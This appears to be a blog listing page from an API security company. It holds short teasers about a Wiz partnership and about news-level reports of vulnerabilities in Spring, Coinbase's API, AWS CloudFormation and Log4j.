New Wiz Partnership Provides Full Visibility, Context, and Control of all Your Cloud APIs
We are all excited about our new strategic partnership with Wiz. Our latest integration gives corporate information security teams unprecedented visibility and control of the APIs scattered across their entire cloud estate. Wiz is the fastest-growing software company in the world for good reason. Their cloud-native, agentless platform connects in ... Read More
Two New RCE Vulnerabilities in Spring
Introduction Between March 29th and March 31st, 2022, two new zero-day vulnerabilities were discovered in the Spring Framework, a popular framework used by Java developers. Both vulnerabilities allow for remote code execution (RCE), although the more recent one, called “Spring4Shell,” is by far the more severe of the two and ... Read More
Coinbase Fixes Vulnerable API that Let You Sell Bitcoin You Didn’t Own
On Friday, February 11th 2022, a security researcher (Tree_of_Alpha on Twitter) discovered a flaw in Coinbase’s new Advanced Trading feature that allowed users to sell cryptocurrencies without owning them. According to the Coinbase blog, the flaw was resolved in a matter of hours without any malicious exploitation. And Coinbase paid ... Read More
BreakingFormation: API Vulnerability in the AWS CloudFormation API
On January 13th, researchers from Orca Security published a vulnerability found in the AWS CloudFormation API, a service that helps users model and set up their AWS resources. The vulnerability allowed the researchers to get file and credential disclosure primitives on an internal AWS service and leverage these to leak ... Read More
Active Testing: Runtime Detection for Log4j Vulnerability in APIs
As mentioned in an earlier blog post, the Log4j vulnerability poses new risks to APIs. APIs are both a new attack vector for this exploit and attackers can extend their reach via APIs ... Read More
Log4j Vulnerability: APIs Causing Massive Risk Exposure
Security teams around the globe are scrambling to address the Apache Log4J2 vulnerability (CVE-2021-44228), dubbed “Log4Shell”, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. The United States Cybersecurity and Infrastructure Security Agency issued ... Read More